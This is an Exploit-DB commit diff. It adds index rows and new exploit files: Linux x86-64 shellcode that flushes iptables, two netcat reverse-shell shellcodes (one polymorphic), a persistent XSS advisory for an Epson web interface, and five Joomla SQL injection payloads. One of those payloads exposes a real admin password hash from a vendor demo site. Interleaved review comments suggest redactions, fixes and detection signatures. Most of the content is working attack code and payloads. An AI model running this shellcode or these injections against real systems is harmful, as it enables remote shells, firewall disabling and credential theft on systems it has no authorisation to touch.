DB: 2017-03-06

9 new exploits

Linux/x86-64 - Polymorphic Flush IPTables Shellcode (47 bytes)
Linux/x86-64 - NetCat Reverse Shell Shellcode (72 bytes)
Linux/x86-64 - Polymorphic NetCat Reverse Shell Shellcode (106 bytes)

Joomla! Component com_jumi - (fileid) Blind SQL Injection
Joomla! Component Jumi - 'fileid' Parameter Blind SQL Injection
EPSON TMNet WebConfig 1.00 - Cross-Site Scripting
Joomla! Component JUX EventOn 1.0.1 - 'id' Parameter SQL Injection
Joomla! Component Monthly Archive 3.6.4 - 'author_form' Parameter SQL Injection
Joomla! Component AYS Quiz 1.0 - 'id' Parameter SQL Injection
Joomla! Component Content ConstructionKit 1.1 - SQL Injection
Joomla! Component AltaUserPoints 1.1 - 'userid' Parameter SQL Injection
Offensive Security 2017-03-06 05:01:18 +00:00
parent d3106003d4
commit 4811e36301
10 changed files with 378 additions and 1 deletions


@ -15928,6 +15928,9 @@ id,file,description,date,author,platform,type,port
41477,platforms/linux/shellcode/41477.c,"Linux/x86-64 - Reverse Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",linux,shellcode,0
41481,platforms/win_x86/shellcode/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shellcode (332 Bytes)",2017-03-01,"Snir Levi",win_x86,shellcode,0
41498,platforms/lin_x86-64/shellcode/41498.nasm,"Linux/x86-64 - Polymorphic Setuid(0) & Execve(/bin/sh) Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0
41503,platforms/lin_x86-64/shellcode/41503.nasm,"Linux/x86-64 - Polymorphic Flush IPTables Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0
41509,platforms/lin_x86-64/shellcode/41509.nasm,"Linux/x86-64 - NetCat Reverse Shell Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
41510,platforms/lin_x86-64/shellcode/41510.nsam,"Linux/x86-64 - Polymorphic NetCat Reverse Shell Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
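Review bot: the 41510 row points to `platforms/lin_x86-64/shellcode/41510.nsam`, while the sibling shellcode rows in this hunk (41498, 41503, 41509) use `.nasm`; unless the file was really committed under that misspelt extension, the CSV path will not resolve when the index is consumed (searchsploit reads files.csv for its paths). Change the row to `41510.nasm` or rename the file so the two agree.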
@ -21317,7 +21320,7 @@ id,file,description,date,author,platform,type,port
8965,platforms/php/webapps/8965.txt,"vBulletin Radio and TV Player AddOn - HTML Injection",2009-06-15,d3v1l,php,webapps,0
8966,platforms/php/webapps/8966.txt,"PHPortal 1 - 'topicler.php id' SQL Injection",2009-06-15,"Mehmet Ince",php,webapps,0
8967,platforms/php/webapps/8967.txt,"The Recipe Script 5 - Cross-Site Scripting",2009-06-15,"ThE g0bL!N",php,webapps,0
8968,platforms/php/webapps/8968.txt,"Joomla! Component com_jumi - (fileid) Blind SQL Injection",2009-06-15,"Chip d3 bi0s",php,webapps,0
8968,platforms/php/webapps/8968.txt,"Joomla! Component Jumi - 'fileid' Parameter Blind SQL Injection",2009-06-15,"Chip d3 bi0s",php,webapps,0
8974,platforms/php/webapps/8974.txt,"XOOPS 2.3.3 - '.htaccess' Remote File Disclosure",2009-06-16,daath,php,webapps,0
8975,platforms/php/webapps/8975.txt,"PHPFK 7.03 - 'page_bottom.php' Local File Inclusion",2009-06-17,ahmadbady,php,webapps,0
8977,platforms/php/webapps/8977.txt,"TekBase All-in-One 3.1 - Multiple SQL Injections",2009-06-17,n3wb0ss,php,webapps,0
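Review bot: the rewrite of 8968 drops the `com_jumi` option name from the description in favour of the 'fileid' Parameter convention used elsewhere in this commit; since `option=com_jumi` is how the component is identified in Joomla URLs (and what defenders grep logs for), consider keeping it alongside the new form, e.g. "Joomla! Component Jumi (com_jumi) - 'fileid' Parameter Blind SQL Injection".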
@ -37416,3 +37419,9 @@ id,file,description,date,author,platform,type,port
41499,platforms/jsp/webapps/41499.txt,"NetGain Enterprise Manager 7.2.562 - 'Ping' Command Injection",2017-02-23,MrChaZ,jsp,webapps,0
41500,platforms/php/webapps/41500.txt,"Joomla! Component Coupon 3.5 - SQL Injection",2017-03-03,"Ihsan Sencan",php,webapps,0
41501,platforms/php/webapps/41501.txt,"pfSense 2.3.2 - Cross-Site Scripting / Cross-Site Request Forgery",2017-03-03,"Yann CAM",php,webapps,0
41502,platforms/hardware/webapps/41502.txt,"EPSON TMNet WebConfig 1.00 - Cross-Site Scripting",2017-03-03,"Michael Benich",hardware,webapps,0
41504,platforms/php/webapps/41504.txt,"Joomla! Component JUX EventOn 1.0.1 - 'id' Parameter SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0
41505,platforms/php/webapps/41505.txt,"Joomla! Component Monthly Archive 3.6.4 - 'author_form' Parameter SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0
41506,platforms/php/webapps/41506.txt,"Joomla! Component AYS Quiz 1.0 - 'id' Parameter SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0
41507,platforms/php/webapps/41507.txt,"Joomla! Component Content ConstructionKit 1.1 - SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0
41508,platforms/php/webapps/41508.txt,"Joomla! Component AltaUserPoints 1.1 - 'userid' Parameter SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0
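Review bot: the 41502 row describes the issue as plain "Cross-Site Scripting" while the advisory it indexes (41502.txt) titles it "Persistent XSS" and cites CVE-2017-6443; stored versus reflected is the qualifier defenders triage on, so carry "Persistent" into the description. Likewise the 41507 row names no parameter although the other five rows for the same author in this hunk do ('id', 'author_form', 'userid').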



@ -0,0 +1,57 @@
# Exploit Title: Persistent XSS in EPSON TMNet WebConfig Ver. 1.00
# Google Dork: intitle:"EPSON TMNet WebConfig Ver.1.00"
# Date: 3/3/2017
# Exploit Author: Michael Benich
# Vendor Homepage: https://www.epson-biz.com/
# Software Link: https://c4b.epson-biz.com/modules/community/index.php?content_id=50
# Version: 1.00
# CVE: CVE-2017-6443
# Contact: benichmt1@protonmail.com // @benichmt1
#####################################################################################
Summary:
Persistent cross-site scripting (XSS) in the web interface of Epson's TMNet WebConfig Ver 1.00 application allows a remote attacker to introduce arbitary Javascript via manipulation of an unsanitized POST parameter.
Steps to reproduce:
1)Make a POST request using Burp Proxy or other application
------------------------------------------------------------------------------------------
POST /Forms/oadmin_1 HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://XXX.XXX.XXX.XXX/oadmin.htm
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
W_AD1=<script>window.alert(0)</script>&W_Link1=&Submit=SUBMIT
------------------------------------------------------------------------------------------
2) Browsing to the main page will execute your script. This remains persistent for any user who then visits this page.
GET /istatus.htm HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://XXX.XXX.XXX.XXX/side.htm
Connection: close
Upgrade-Insecure-Requests: 1
------------------------------------------------------------------------------------------
Timeline:
------------------------------------------------------------------------------------------
12/1/2016 - Discovery.
12/9/2016 - Emailed support@ , info@ , and domain-admin@ emails. No response.
12/16/2016 - Pinged on Twitter. Recommended to contact through support.
12/22/2016 - Reached on LinkedIn directly to individual listed as Security Engineer and asked to find proper security contact channel. No response, but the connection request was accepted.
3/3/2017 - Disclosure
------------------------------------------------------------------------------------------
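Review bot: `Content-Length: 47` does not match the body shown in step 1: `W_AD1=<script>window.alert(0)</script>&W_Link1=&Submit=SUBMIT` is 61 bytes as written (47 covers only `W_AD1=...&W_Link1=`), and a browser would URL-encode the angle brackets and parentheses anyway, so the record is not self-consistent; either correct the header or state that the body is shown decoded. The summary should also spell out the defect and its fix: `W_AD1` is stored and later emitted into `/istatus.htm` without output encoding, so the remediation is HTML-encoding that value at render time (and rejecting markup on input). Minor: "arbitary" in the summary should read "arbitrary".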


@ -0,0 +1,53 @@
;The MIT License (MIT)
;Copyright (c) 2017 Robert L. Taylor
;Permission is hereby granted, free of charge, to any person obtaining a
;copy of this software and associated documentation files (the “Software”),
;to deal in the Software without restriction, including without limitation
;the rights to use, copy, modify, merge, publish, distribute, sublicense,
;and/or sell copies of the Software, and to permit persons to whom the
;Software is furnished to do so, subject to the following conditions:
;The above copyright notice and this permission notice shall be included
;in all copies or substantial portions of the Software.
;The Software is provided “as is”, without warranty of any kind, express or
;implied, including but not limited to the warranties of merchantability,
;fitness for a particular purpose and noninfringement. In no event shall the
;authors or copyright holders be liable for any claim, damages or other
;liability, whether in an action of contract, tort or otherwise, arising
;from, out of or in connection with the software or the use or other
;dealings in the Software.
;
; For a detailed explanation of this shellcode see my blog post:
; http://a41l4.blogspot.ca/2017/03/polyflushiptables1434.html
global _start
section .text
_start:
push 82
pop rax
cdq
push rdx
push word '-F'
push rsp
pop rbx
push rdx
mov rcx, 'iptables'
push rcx
shl al,1
sub al,cl
mov rcx, '//sbin//'
push rcx
push rsp
pop rdi
push rdx
push rbx
push rdi
push rsp
pop rsi
syscall
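Review bot: the polymorphic constant derivation is uncommented: `shl al,1` / `sub al,cl` lands on 59 (execve) only because rax holds 82 from the `push 82` / `pop rax` pair and cl holds 'i' (0x69) from `mov rcx, 'iptables'`, and a reader has to reverse-engineer that; a one-line comment on each of those instructions, like the argv comments in the 41509 listing, would fix it. The same goes for `push word '-F'`, which relies on the `push rdx` just before it to supply the string's null terminator. For defenders, the resulting call is execve("//sbin//iptables", ["//sbin//iptables", "-F"], NULL), so an execve of iptables with `-F` from an unexpected parent process is the observable to alert on.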


@ -0,0 +1,70 @@
;The MIT License (MIT)
;Copyright (c) 2017 Robert L. Taylor
;Permission is hereby granted, free of charge, to any person obtaining a
;copy of this software and associated documentation files (the “Software”),
;to deal in the Software without restriction, including without limitation
;the rights to use, copy, modify, merge, publish, distribute, sublicense,
;and/or sell copies of the Software, and to permit persons to whom the
;Software is furnished to do so, subject to the following conditions:
;The above copyright notice and this permission notice shall be included
;in all copies or substantial portions of the Software.
;The Software is provided “as is”, without warranty of any kind, express or
;implied, including but not limited to the warranties of merchantability,
;fitness for a particular purpose and noninfringement. In no event shall the
;authors or copyright holders be liable for any claim, damages or other
;liability, whether in an action of contract, tort or otherwise, arising
;from, out of or in connection with the software or the use or other
;dealings in the Software.
;
; For a detailed explanation of this shellcode see my blog post:
; http://a41l4.blogspot.ca/2017/03/netcatrevshell1434.html
global _start
section .text
_start:
xor edx,edx
push '1337'
push rsp
pop rcx
push rdx
mov rax,'/bin//sh'
push rax
push rsp
pop rbx
push rdx
mov rax,'/bin//nc'
push rax
push rsp
pop rdi
push '1'
mov rax,'127.0.0.'
push rax
push rsp
pop rsi
push rdx
push word '-e'
push rsp
pop rax
push rdx ; push null
push rbx ; '/bin//sh'
push rax ; '-e'
push rcx ; '1337'
push rsi ; '127.0.0.1'
push rdi ; '/bin//nc'
push rsp
pop rsi ; address of array of pointers to strings
push 59 ; execve system call
pop rax
syscall
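Review bot: the listing should document its runtime assumptions: the callback target is hard-coded as `127.0.0.1` / `1337`, and `-e` is only honoured by netcat builds that support program execution (netcat-traditional, ncat); netcat-openbsd omits it, so on many distributions the execve succeeds but no shell is returned. The `push '1337'` and `push '1'` instructions also depend on the immediate being sign-extended to a full qword to provide the null terminators for "1337" and "127.0.0.1", which deserves a comment alongside the existing `; push null`. For detection, the argv this builds, `/bin//nc 127.0.0.1 1337 -e /bin//sh`, is exactly the `nc -e <shell>` pattern most process-creation rules already match on.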


@ -0,0 +1,84 @@
;The MIT License (MIT)
;Copyright (c) 2017 Robert L. Taylor
;Permission is hereby granted, free of charge, to any person obtaining a
;copy of this software and associated documentation files (the “Software”),
;to deal in the Software without restriction, including without limitation
;the rights to use, copy, modify, merge, publish, distribute, sublicense,
;and/or sell copies of the Software, and to permit persons to whom the
;Software is furnished to do so, subject to the following conditions:
;The above copyright notice and this permission notice shall be included
;in all copies or substantial portions of the Software.
;The Software is provided “as is”, without warranty of any kind, express or
;implied, including but not limited to the warranties of merchantability,
;fitness for a particular purpose and noninfringement. In no event shall the
;authors or copyright holders be liable for any claim, damages or other
;liability, whether in an action of contract, tort or otherwise, arising
;from, out of or in connection with the software or the use or other
;dealings in the Software.
; For a detailed explanation of this shellcode see my blog post:
; http://a41l4.blogspot.ca/2017/03/polynetcatrevshell1434.html
global _start
section .text
_start:
jmp next
sh:
db 0x68,0x73,0x2f,0x2f,0x6e,0x69,0x62,0x2f
nc:
db 0x63,0x6e,0x2f,0x2f,0x6e,0x69,0x62,0x2f
ip:
db 0x2e,0x30,0x2e,0x30,0x2e,0x37,0x32,0x31
handle:
pop rcx
lodsq
bswap rax
push rax
push rsp
push rcx
ret
next:
xor edx,edx
lea rsi,[rel sh]
push rdx
call handle
pop rbx
push rdx
call handle
pop rdi
push '1'
call handle
pop r12
push '1337'
push rsp
pop rcx
push rdx
push word '-e'
push rsp
pop rax
push rdx ; push null
push rbx ; '/bin//sh'
push rax ; '-e'
push rcx ; '1337'
push r12 ; '127.0.0.1'
push rdi ; '/bin//nc'
push rsp
pop rsi ; address of array of pointers to strings
; some magic to put 3b (59) into RAX
; note that this depends on the push "-e"
; and it's position on the stack
mov rax,[rsp + 48]
shr rax,8
sub rax,0x2a
syscall
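Review bot: the three `db` blocks at `sh`, `nc` and `ip` store their strings byte-reversed and are decoded by `bswap rax` in `handle`, but the listing never says what they decode to ("/bin//sh", "/bin//nc", "127.0.0."); add that to each `db` line, and comment the `pop rcx` / `push rcx` / `ret` sequence in `handle`, which saves the return address around the two pushes so the caller can `pop` the string pointer. The "some magic" comment on `mov rax,[rsp + 48]` could be made precise: at that offset sits the word "-e" followed by six zero bytes from the preceding `push rdx`, so `shr rax,8` leaves 0x65 ('e') and `sub rax,0x2a` gives 0x3b (59, execve). `lodsq` additionally assumes DF is clear, which the ABI guarantees at function entry but is worth stating for code that may be dropped into an arbitrary context.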

platforms/php/webapps/41504.txt Executable file

@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Joomla! Component JUX EventOn v1.0.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_jux_eventon
# Date: 04.03.2017
# Vendor Homepage: http://joomlaux.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/jux-eventon/
# Demo: http://demo.joomlaux.com/extensions/eventon/
# Version: 1.0.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_jux_eventon&view=event&id=[SQL]
# 3+union+select+1,@@version,3,4,5,6
# # # # #
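Review bot: the file's title says only "SQL Injection" while the files.csv row for 41504 names the injection point ('id' Parameter); make the two consistent, preferably by putting the parameter into the file's title since the CSV description is derived from it. The `3+union+select+1,@@version,3,4,5,6` PoC shows `id` reaching the query without integer casting, so the remediation a reader would want recorded is to cast `id` to int or bind it as a query parameter in the component.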

platforms/php/webapps/41505.txt Executable file

@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Joomla! Component Monthly Archive v3.6.4 - SQL Injection
# Google Dork: inurl:index.php?option=com_monthlyarchive
# Date: 04.03.2017
# Vendor Homepage: http://web357.eu/
# Software Buy: https://extensions.joomla.org/extensions/extension/news-display/articles-display/monthly-archive/
# Demo: http://demo.web357.eu/joomla/en/browse/monthly-archive
# Version: 3.6.4
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_monthlyarchive&view=monthlyarchive&month_year_form=07-2017&order=0&author_form=[SQL]
# 1+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e,0x496873616e53656e63616e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
# # # # #
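Review bot: the file title omits the 'author_form' parameter that the CSV row for 41505 names, and, unlike 41507 in the same commit, the listing shows no expected response for its error-based payload (the `COUNT(*)`, `FLOOR(RAND(0)*2)`, `GROUP BY` duplicate-key technique), so a reader cannot tell whether success means a visible MySQL 1062 error or something else. The application-side fix is the same as for the sibling advisories: bind `author_form` as a parameter instead of interpolating it, and stop echoing database errors to the page.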

platforms/php/webapps/41506.txt Executable file

@ -0,0 +1,29 @@
# # # # #
# Exploit Title: Joomla! Component AYS Quiz v1.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_aysquiz
# Date: 04.03.2017
# Vendor Homepage: http://ays-pro.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/living/education-a-culture/ays-quiz/
# Demo: http://demo.ays-pro.com/index.php/ays-quiz
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php/index.php?option=com_aysquiz&controller=question&id=[SQL]&format=raw
# For example;
# 1'+/*!50000union*/+select+(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),2,3,4,5-- -&format=raw
# :title<li>whlzd_users
# :id<li>whlzd_users
# :name<li>whlzd_users
# :username<li>whlzd_users
# :email<li>whlzd_users
# :password<li>whlzd_users
# :block<li>whlzd_users
# 1'+/*!50000union*/+select+/*!50000concat*/(username,/*!50000char*/(58),password),2,3,4,5+from+whlzd_users-- -&format=raw
# <input class='ays_radio hide' type='radio' id='ans_admin:$2y$10$T7Cetq0lrME/gyxxS0usx.bh2OldeDOhccAW7Ikf33.KhbmZbEgfa'
# Etc...
# # # # #
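Review bot: the lines from `:title<li>whlzd_users` through the `ans_admin:$2y$10$...` sample reproduce the table prefix, column list and an administrator's bcrypt hash from the vendor's demo instance (the `# Demo:` URL above); redact the hash before publication, since the advisory's point is the injection, not the demo site's credentials. The title also omits the 'id' parameter that the CSV row for 41506 names, and the `&format=raw` suffix that the payload depends on is worth calling out as the reason the output is returned unrendered.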

platforms/php/webapps/41507.txt Executable file

@ -0,0 +1,20 @@
# # # # #
# Exploit Title: Joomla! Component Content ConstructionKit v1.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_os_cck
# Date: 04.03.2017
# Vendor Homepage: http://ordasoft.com/
# Software Buy: http://ordasoft.com/cck-content-construction-kit-for-joomla.html
# Demo: http://ordasvit.com/joomla-cck-classic/
# Version: 1.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php/2016-04-11-13-03-22/search?search=Ihsan_Sencan&categories[]=[SQL]&task=search&option=com_os_cck&Itemid=133
# 9+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e,0x496873616e53656e63616e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
# 1062 Duplicate entry 'ordasvit_joomla-cck-classic~IhsanSencan1' for key 'group_key'
# Etc..
# # # # #
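Review bot: the injection point is the `categories[]` array parameter, yet neither this title nor the CSV row for 41507 names it while every sibling entry in the commit does; suggest "'categories[]' Parameter SQL Injection". The `1062 Duplicate entry 'ordasvit_joomla-cck-classic~IhsanSencan1' for key 'group_key'` line exposes the database name of the vendor demo host and should be redacted like any other data lifted from a third-party site; it does usefully document that the payload only works where MySQL errors are echoed to the page, which is the second thing the vendor should fix.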

platforms/php/webapps/41508.txt Executable file

@ -0,0 +1,19 @@
# # # # #
# Exploit Title: Joomla! Component AltaUserPoints v1.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_altauserpoints
# Date: 04.03.2017
# Vendor Homepage: https://www.nordmograph.com/
# Software: https://extensions.joomla.org/extensions/extension/e-commerce/credits-a-point-systems/altauserpoints/
# Demo: https://www.nordmograph.com/workshop/
# Version: 1.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/index.php?option=com_altauserpoints&view=account&userid=[SQL]
# 1'+/*!50000OR*/+1+/*!50000GROUP*/+BY+/*!50000CONCAT_WS*/(0x3a,0x496873616e53656e63616e,DATABASE(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1-- -
# # # # #
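Review bot: the `# Login as regular user` step makes this an authenticated (post-login) injection, but neither the title nor the CSV row for 41508 says so; since the precondition changes the severity, put "Authenticated" in the title or add an explicit prerequisites line. The `userid` value also reaches the query unparameterized, and since the logged-in user's id is already known server-side, the component should not be accepting it from the request at all.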